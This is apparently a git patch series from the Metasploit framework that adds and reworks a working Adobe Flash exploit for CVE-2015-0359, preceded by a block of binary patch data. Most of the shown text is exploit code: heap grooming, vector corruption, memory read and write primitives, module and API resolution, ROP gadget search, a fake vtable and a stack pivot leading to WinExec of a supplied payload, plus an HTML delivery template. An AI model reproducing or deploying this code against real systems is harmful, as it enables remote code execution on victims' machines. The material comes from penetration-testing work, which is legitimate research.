zkua-9-<leTe{Vwn_0fST3hJ|kX~uR%nt*MAs47wVk8IvFW{eL}5^Aes=$Y>LxJ>1{
zR&26o5)`|}>d|qV>#`%VB!OK&5l>TS!zaZ<BU9TL$WLwqyqA`EZocS$%1=%{fY`+W
z13mAvt#?;g11)OwO<ur39c(I7h(l~(BnDW|_i?Qjf9ZJUual?JOFDH1{lDeE9=~+_
zu5WubCm8}BT4H;M1B$h@X^4uUhC<twr^(K9J8FIG9^>%vwI6pIEOOz!6i2wKz@|UM
zPhvUd=kKIw*d-=~-L=J)02Q{4Y4|Y0Q`^McjRBuaN`DqhQ4i{cX$LL<S;n0b-+M0l
zMby-De-oo6>$o?3AZT(S^OdqhP!jq;!x57p^&V!ZKzZB62|trzNZ*G=B3AW!YnaIP
z@V^$K%Jlt??^>5kWZSsOdvv#ZOJ0J(>jb*ZVKPmjSor!ES`l|8YmdirICdjX5~#@7
z+_9ul0$bG%60Gwi!d+gm=-yViGZ6W|{`vjVf7V@?zC{0C^SPQ6Yu~|o?N+D(F2SBh
zsEat3oj3v${C|OS5gt>rMf~VAob*h<*7I1`dh$`=K7eoDo7;<G<yh;$TsM$YrQMc$
z<h)#_Gs|30S)K1GuX1yYhWYVv5z&tkJ+wlp9&}bB-xUlSX10env)~_WO*zgaek+c|
zf1qh^Y1yu&R%#&lR3x!qHCX7tEj2_Ib`ZzOuEVDTp{<Q>GjY#OdnGcrenGT(trdgx
z(yPEZwqY5VLg*bR;#hTL{Y=IsLayqjA>3$VST`YED%$i%Cp>E7gEylKJGQ|Z7r?Sr
z7ARWIQqG2FH^8yV&l~qA--GewevXtMe^MO<>I}8{<H)!XP|y=&IDr#R>H>+Yvb5gn
zvdE6=hnW?6mpl9l*-GX1pt3(?q(}q^DPN0v95ml=oupCe$T%W(-rGBELW8c%**3nH
zPWQQhn+T<@aSOHdVkxg+x4O|dxZYo1!PhvjKE^tb+~@1|#J2%gaKa!TJ`6u0e{5D1
zSS{3z8+N0oO0P3i8`=bjk&^cJR9uy}!Iz#i+J}*<0sO>~VehXfsTcGo6Y6pX_yE}B
zW3*o}L<8S7`R3hG(ouiYx<z{&vN4+#o@z|}J7vJ|tc2KQlwOdLOvt!;<H>bEySdrQ
z-bq$W`KwbyNV3<%->Ye<w9Zl|e^k$AAnHxR#{l@?@USyM=AG+nkT<y<80e?pPXmYB
zvV>^-S+{$GL>4J#WC-kEFbh3pNK%oq5sMgq5K{`ACThaT*)V;1YjbMHO^2?|oCSU4
zK0!OFY(QmrrJ%@sD)DI>U3L;*8AcVAndNh#dT0BevhXfZ{JmkZ4dssNf2p41J9u)d
zcMYH^q-o70l<)q=EBggH4$W{MYvp{d26wtb8*X#vL_Ab!(5e>yz<ILASxG9Gqi<*i
zl}NcCbfpKBEyCkpZK$;_u8=gQGT_rfMki-Q#jIZ=DN4bAvjjt1l)M$RkK6#SPLP#y
zUV9<sv<M^H6DL3ossAxBe<m^svD=73cD^Vs|8oASSz2tRASPs=g>^pp3EKz05#t-r
zHz1EDNI~PB>pu1hZ0JGfH~d1@liE3c1z$*eY*mR;L<!^CUnSI86@iCI^pN*bN6?<_
z_pe?aawE2G(rD^-5L6r=sbqnEhypy+f&LGU1N~0O825cZS+&E?e-z)1TyC%Ir1aBH
z;yPn~Z2N|(H4X8!O%m+rL0sjefQ8aX-O5UO*VHWIYIln@lW3bZMp!A}8}1c^9n5TU
z&fOHcjwP~N_AR+F9fC{db)Ud3J=MHEUTSA0z3sh5M=iJ~fAHAfJC$?J4$kg=#R*RW
zkxi{QhcIygWfO#bf4q|C$6%QWk4GZ7{!jAKb)gpj57*c7(=eti0cmaN=hb8JglLU=
zi8ZFy#kOU^4u;UJUFJ(n$;eE0p_jrIBS^c7_B8Y(bfoF_6)d4cZ*yuB>0^MUjeEw-
zs?=EH`@av`XG`$+@<^*&f%O%X5eyZW+>Cb7wF=Zi-;fJMf2a+<tRL$H;2MFLD5Gpb
zHmc@rm9nc@Gc#y{z2oXjW&9M<C*S;<4hI*cj(?l4F467^#aCSqg6X7XpD4pO<Ju5b
zWUm({c?7~;Hu{{;XwON1N0B#dc_pdpFNgM8fzXDKI~A~wa`1AyM}Bz%>i&b6kXHMf
z$1ra+DQ^^!e>Dq?4mq^hdRtpAgE0R8c~Ot@DV-?k^YXCO*XY}J0EOb0*^AN@p)vTx
zxLHEi_DAzs>)bn>HYE*{0a#`+S*gYRvzS#g<6_?8{Z*z~UaCZA9Lb7V(Uy_{L72(S
z*euVpplFE>_v@Qf5Gx>8$#|{20jLI7`LK~7e3Xpc4Plx_5`TdtvFfMJ)T*a=$==IZ
z?@g(PGn9y2fFT6HUI@~G!R@W(d_;XuMs$&)+ZHYiFa~*7MvL}#t^2yA5B>aVt^-4d
zc=iikm-+PI#yxk7ret<0L3S$ut-HG4QyUsKzH-g<2SE$FkRB8PiG;7WW(JdT{y~oq
zP$E&@5|@v&Lw{Pu(&(tY$hjdBC)Uual$OK)IFTvLj5-463G1ovk7YEJu(<}%vxV)a
zo3s5{o17m7|9Dz;z!g6yte!*8<z;g%n|~7aB`8txQA6N)8NC>{>JZ+Pb_WwXES5YN
zo@Ox%<w0~<w)<A@3B^sY-7ohU3>0!mk}Ec1A18TXlz;z_dYl7}L=Fm2z(_|B(L_8#
zC@*CZR{DpKEt7Nku3IT>l^f11TcU<D_twzzHr+Kss96gg_=^qV$wreNMX-tqnI{GV
z>}L}!_=qY*^=4IJd-Ay)38}MOXF46D%S8=vraLk><e(%NQcONEw|6Mq2<v((fOaAj
z+sl8<_J3<0`7RKaRF#FG4*k0TgN}NH7A#5h^IK}IzmbiwYn=jp4Bn^C*e*Ba>i`0Y
z)kY04J9TbA=pNDSpfhiz=z%bfkSaP3)b8X%beGqd&n8+q<zEDkJoB_~;J>bUu<*qO
z@tY7oBiGRuLQJ1RYXeoH<1a=g4o@>>(DS))1AkcP!TmtN4WpVInu}t19j4Z$vaXYI
zW)hi%&+`whXm@i?9sneESU#qNBQ2ak-W*JIYG>0dIpWa?-UbTnB~)>ulgC5-F;69>
z*YCXmeLzbx{y%)Z4fg^;MvrZVchAPb55g)yO>0l%(C*V45ESg#nf`OYYd008*@qxU
z5r6PSwrCmkM}o)JrBxTs_TA4bfYT3}!6b0(<k-)GOg|ZFQMLKVOOfa6JR|H42|ApD
z1h(j$9_pI&YnUniUDn?yd|9G?=+-e4>&tYYlTa82dvSn$99kN|t*czSYap_wD!T&+
z?8i#zkabCe?r1_pq{_Z3#Hnu7Vvu;`-GAl~vJhjilhd6s_Z?B+;}%Jyg@6@JzT=qQ
z-2Ik5B&XmD=+EE}zT<~(+VQ9%Z?lvzk7jx8=jSZT_<{jR4M%LbYOUu=wDeZHhKfBH
z=<IMp`$mU*>s3U2lXR-&NlOra%PrVNp!M{Ld!@&?e{yQnT5Q7&pM{gwI@Zn5zkky2
zoHM;Y+^v-q&jqe~;}`=vaKgR~Ew!-?W}Q}7Ep5?*ieD@QpRx|bxJGiTNvz4xHAuh)
zj|r24ZS8t-Rw~PsTP^Ql#!CBGi^fcaG2uYYnj}w|={s1js1{~wHQmI2G~c2H6qQdH
zn67Dz*lzkE9m5C?4Emm%DANm^Qh!SpXqLSt?o1q(i7eq<kL(_IrCHu^XKA<*RRIPH
z@+X;2S<R7<vf6VFFh+I>pugwzMy~ozHT$xY$xtm9Ms(&6fIVDFK%a7fZPjOKzQE-w
z!;y~J#;8Q_*u{j$nL}TxyO#(L)85|2Iw8*0(0+;4l;+|<m5~f@@3;b`!+)G?EYJ`b
z+ij3Jt2ipmD39!d1Ky@{2JB&EaVdyM0OMiF#+1|Ezxkg?!=ADOZ`zHe2Hr@8=fdl=
zbV8M$fCuLuh&5_oTX68@gmYrl)C_KnbtNxXGU?ZUQ;v85US2&2^sQKsI&5e0p#OL_
zGiX`NEqH6mVb3`KdqJJk7k@CZcrRY#=uH!-XYymHezIufv9dk4h2~=FUw+}vb83xp
z*!@hIOWGcka15Izkn{MQh`qxFz$-&bk(HHjILS2q&WmhSk>ULqR|`EJov~C^zY#=I
z#|g|}>~A>fi%d#xTJycQX+gOL`_|o#uq>wcOR`E1?PAbcPY>IEnt$;51%ofz%bAw+
zUeAz+t|?2_JjcMGi^DEMr+mw~v%D^eFpcPh`pW5MAOh0grWGq~a->x`hJ_5v1SxLc
zMIF8uYVrQLDcBsN2*@7&Mf@_0lwmUPSDGP1)Q2^Re~<y3kWU_C_1jnP=Y-E9L^0ll
zt>At=g$hZRjSkA1Y=0A#f7T!%aHlV64Fn@@@jmeFbqwT=PkBSRF*N*q3_llSr`c1_
z>q^KlPA_)(11p017CO11+~eYOYgMrKglHCF*T}<ErG4Zk`jNjF9mot^B`(mE#)86p
zXe^2+wniULFynHn-W5SxdfYX@<J;qEAza{k|K|Wr!H8f+ARE6i4Q~ZkD8Qx)D+gt@
Q9v7M^lDz`||6wwl0PL?K4FCWD

diff --git a/external/source/exploits/CVE-2015-0359/Exploit.as b/external/source/exploits/CVE-2015-0359/Exploit.as
new file mode 100755
index 0000000000..104ae2d7cd
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/Exploit.as
@@ -0,0 +1,123 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Be support to support 16.0 as target-player (flex-config.xml).
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 5. Build with: mxmlc -o msf.swf Msf.as
+
+// Original code by @hdarwin89 modified to be used from msf
+// https://git.hacklab.kr/snippets/13
+// http://pastebin.com/Wj3NViUu
+
+package
+{
+	import flash.display.Sprite
+	import flash.events.Event
+	import flash.utils.ByteArray
+	import flash.system.Worker
+	import flash.system.WorkerDomain
+	import flash.system.MessageChannel
+	import flash.system.ApplicationDomain
+	import avm2.intrinsics.memory.casi32
+	import flash.display.LoaderInfo
+	import mx.utils.Base64Decoder
+
+	public class Exploit extends Sprite 
+	{
+		private var ov:Vector.<Object> = new Vector.<Object>(25600)
+		private var uv:Vector.<uint> = new Vector.<uint>
+		private var ba:ByteArray = new ByteArray()
+		private var b64:Base64Decoder = new Base64Decoder()
+		private var worker:Worker
+		private var mc:MessageChannel
+	    private var payload:ByteArray
+	    private var platform:String
+	    private var os:String
+		private var exploiter:Exploiter
+
+		public function Exploit() 
+		{
+			if (Worker.current.isPrimordial) mainThread()
+			else workerThread()
+		}
+
+		private function mainThread():void
+		{
+	        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+	        os = LoaderInfo(this.root.loaderInfo).parameters.os
+	        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+	        var pattern:RegExp = / /g;
+	        b64_payload = b64_payload.replace(pattern, "+")
+	        b64.decode(b64_payload)
+	        payload = b64.toByteArray()
+			
+			ba.length = 0x1000
+			ba.shareable = true
+	        for (var i:uint = 0; i < ov.length; i++) {
+	            ov[i] = new Vector.<uint>(1014)
+	            ov[i][0] = 0xdeedbeef
+	        }
+			for (i = 0; i < ov.length; i += 2) delete(ov[i])
+			worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
+			mc = worker.createMessageChannel(Worker.current)
+			mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
+			worker.setSharedProperty("mc", mc)
+			worker.setSharedProperty("ba", ba)
+			ApplicationDomain.currentDomain.domainMemory = ba
+			worker.start()
+		}
+
+		private function workerThread():void
+		{
+			var ba:ByteArray = Worker.current.getSharedProperty("ba")
+			var mc:MessageChannel = Worker.current.getSharedProperty("mc")
+			var tmp:ByteArray = new ByteArray()
+			tmp.length = 0x2000
+			
+			for (var i:uint = 0; i < 20; i++) {
+				new Vector.<uint>(1022)
+			}
+			
+			ba.writeBytes(tmp)
+			ov[0] = new Vector.<uint>(1022)
+			
+			mc.send("")
+			while (mc.messageAvailable);
+			
+	        for (i = 0;; i++) {
+	        	if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
+					ov[0][i] = 0xffffffff
+					break
+	        	}
+	        }
+			ov[0][0xfffffffe] = 1014
+			
+			mc.send("")
+		}
+
+		private function onMessage(e:Event):void
+		{
+	        var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
+			Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
+			if (mod == 1022) mc.receive()
+	        else {			
+		        for (var i:uint = 0; i < ov.length; i++) {
+		            if (ov[i].length == 0xffffffff) {
+						uv = ov[i]
+					} else {
+						if (ov[i] != null) {
+							delete(ov[i])
+							ov[i] = null
+						}
+					}
+		        }
+				if (uv == null) {
+					Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
+					return
+				}
+				exploiter = new Exploiter(this, platform, os, payload, uv)
+	        }
+		}
+	}
+}
diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as
deleted file mode 100755
index 3556b41542..0000000000
--- a/external/source/exploits/CVE-2015-0359/Msf.as
+++ /dev/null
@@ -1,264 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Be support to support 16.0 as target-player (flex-config.xml).
-// 3. Download the Flex SDK (4.6)
-// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 5. Build with: mxmlc -o msf.swf Msf.as
-
-// Original code by @hdarwin89 modified to be used from msf
-// https://git.hacklab.kr/snippets/13
-// http://pastebin.com/Wj3NViUu
-
-package
-{
-	import flash.display.Sprite
-	import flash.events.Event
-	import flash.utils.ByteArray
-	import flash.system.Worker
-	import flash.system.WorkerDomain
-	import flash.system.MessageChannel
-	import flash.system.ApplicationDomain
-	import avm2.intrinsics.memory.casi32
-	import flash.display.LoaderInfo
-	import mx.utils.Base64Decoder
-
-	public class Msf extends Sprite 
-	{
-		private var ov:Vector.<Object> = new Vector.<Object>(25600)
-		private var uv:Vector.<uint> = new Vector.<uint>
-		private var ba:ByteArray = new ByteArray()
-		private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
-		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
-		private var b64:Base64Decoder = new Base64Decoder()
-		private var payload:String = ""
-		private var worker:Worker
-		private var mc:MessageChannel
-
-		public function Msf() 
-		{
-			if (Worker.current.isPrimordial) mainThread()
-			else workerThread()
-		}
-
-		private function mainThread():void
-		{
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			payload = b64.toByteArray().toString()
-			ba.length = 0x1000
-			ba.shareable = true
-			for (var i:uint = 0; i < ov.length; i++) {
-				ov[i] = new Vector.<Object>(1014)
-				ov[i][0] = ba
-				ov[i][1] = this
-				ov[i][2] = stack
-				ov[i][3] = payload_space
-			}
-			for (i = 0; i < ov.length; i += 2) delete(ov[i])
-			worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
-			mc = worker.createMessageChannel(Worker.current)
-			mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
-			worker.setSharedProperty("mc", mc)
-			worker.setSharedProperty("ba", ba)
-			ApplicationDomain.currentDomain.domainMemory = ba
-			worker.start()
-		}
-
-		private function workerThread():void
-		{
-			var ba:ByteArray = Worker.current.getSharedProperty("ba")
-			var mc:MessageChannel = Worker.current.getSharedProperty("mc")
-			var tmp:ByteArray = new ByteArray()
-			tmp.length = 0x2000
-			
-			for (var i:uint = 0; i < 20; i++) {
-				new Vector.<uint>(1022)
-			}
-			
-			ba.writeBytes(tmp)
-			ov[0] = new Vector.<uint>(1022)
-			
-			mc.send("")
-			while (mc.messageAvailable);
-			
-			// Vector length corruption didn't work, aborting...
-			if (ov[0].length != 0xffffffff) {
-				return
-			}
-			
-			// Bad memory layout :( restoring length, and aborting...
-			if (ov[0][0x407] != 0x3f6) {
-				ov[0][0x3ffffffe] = 1022
-				return
-			}
-			
-			ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
-			var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) //+ 0x100000
-			var main:uint = ov[0][0x409] - 1
-			var stack_object:uint = ov[0][0x40a] - 1
-			var payload_space_object:uint = ov[0][0x40b] - 1
-			var vtable:uint = vector_read(main)
-			var stack_address:uint = vector_read(stack_object + 0x18) as uint
-			var payload_address:uint = vector_read(payload_space_object + 0x18) as uint
-			vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
-			vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
-			mc.send(buffer.toString() + "/" + main.toString() + "/" + vtable.toString() + "/" + stack_address.toString() + "/" + payload_address.toString())
-		}
-
-		private function onMessage(e:Event):void
-		{
-			casi32(0, 1022, 0xFFFFFFFF)
-			if (ba.length != 0xffffffff) mc.receive()
-			else {
-				// Restoring vector length
-				var res:uint = casi32(0, 0xffffffff, 1022)
-				if (res != 0xffffffff) { // Something has been wrong... aborting
-					return
-				}
-				ba.endian = "littleEndian"
-				var data:Array = (mc.receive() as String).split("/")
-				var buffer:uint = parseInt(data[0]) as uint
-				var main:uint = parseInt(data[1]) as uint
-				var vtable:uint = parseInt(data[2]) as uint
-				var stack_address:uint = parseInt(data[3]) as uint
-				var payload_address:uint = parseInt(data[4]) as uint
-				var flash:uint = base(vtable)
-				var winmm:uint = module("winmm.dll", flash)
-				var kernel32:uint = module("kernel32.dll", winmm)
-				var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-				var winexec:uint = procedure("WinExec", kernel32)
-				var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-				var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-				
-				// Continuation of execution
-				byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-				byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-				byte_write(0, "\x89\x03", false) // mov [ebx], eax
-				byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-				// Put the payload (command) in memory
-				byte_write(payload_address + 8, payload, true); // payload
-
-				// Put the fake vtabe / stack on memory
-				byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-				byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-				byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-				byte_write(0, virtualprotect)
-
-				// VirtualProtect
-				byte_write(0, winexec)
-				byte_write(0, buffer + 0x10)
-				byte_write(0, 0x1000)
-				byte_write(0, 0x40)
-				byte_write(0, buffer + 0x8) // Writable address (4 bytes)
-
-				// WinExec
-				byte_write(0, buffer + 0x10)
-				byte_write(0, payload_address + 8)
-				byte_write(0)
-
-				byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
-							
-				toString() // call method in the fake vtable
-			}
-		}
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{			
-			var pos:uint = 0
-
-			if (addr > ov[0][0]) {
-				pos = ((addr - ov[0][0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
-			}
-
-			ov[0][pos] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			var pos:uint = 0
-
-			if (addr > ov[0][0]) {
-				pos = ((addr - ov[0][0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
-			}
-
-			return ov[0][pos]
-		}
-		
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-
-		private function base(addr:uint):uint
-		{
-			addr &= 0xffff0000
-			while (true) {
-				if (byte_read(addr) == 0x00905a4d) return addr
-				addr -= 0x10000
-			}
-			return 0
-		}
-
-		private function module(name:String, addr:uint):uint
-		{
-			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
-			while (true) {
-				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
-				if (!entry) throw new Error("FAIL!");
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
-			}
-			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
-		}
-
-		private function procedure(name:String, addr:uint):uint
-		{
-			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
-			var numberOfNames:uint = byte_read(eat + 0x18)
-			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
-			var addressOfNames:uint = addr + byte_read(eat + 0x20)
-			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
-			for (var i:uint = 0; ; i++) {
-				var entry:uint = byte_read(addressOfNames + i * 4)
-				ba.position = addr + entry
-				if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
-			}
-			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
-		}
-
-		private function gadget(gadget:String, hint:uint, addr:uint):uint
-		{
-			var find:uint = 0
-			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
-			var value:uint = parseInt(gadget, 16)
-			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
-			return addr + i
-		}
-	}
-}
diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
index 76b798a401..5b1fdf05f8 100644
--- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
+++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
@@ -6,9 +6,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -48,8 +47,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
           :flash   => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
           :arch    => ARCH_X86
         },
@@ -83,17 +85,18 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>

From ab132290d712625cd4de4677029032ebb8a2ecad Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 13:53:45 -0500
Subject: [PATCH 0389/1013] Add Exploiter AS

---
 external/source/exploits/CVE-2015-0359/Elf.as | 235 +++++++++++
 .../CVE-2015-0359/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2015-0359/ExploitVector.as   |  74 ++++
 .../exploits/CVE-2015-0359/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2015-0359/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-0359/PE.as  |  72 ++++
 6 files changed, 897 insertions(+)
 create mode 100644 external/source/exploits/CVE-2015-0359/Elf.as
 create mode 100644 external/source/exploits/CVE-2015-0359/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-0359/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-0359/Exploiter.as
 create mode 100644 external/source/exploits/CVE-2015-0359/Logger.as
 create mode 100644 external/source/exploits/CVE-2015-0359/PE.as

diff --git a/external/source/exploits/CVE-2015-0359/Elf.as b/external/source/exploits/CVE-2015-0359/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0359/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
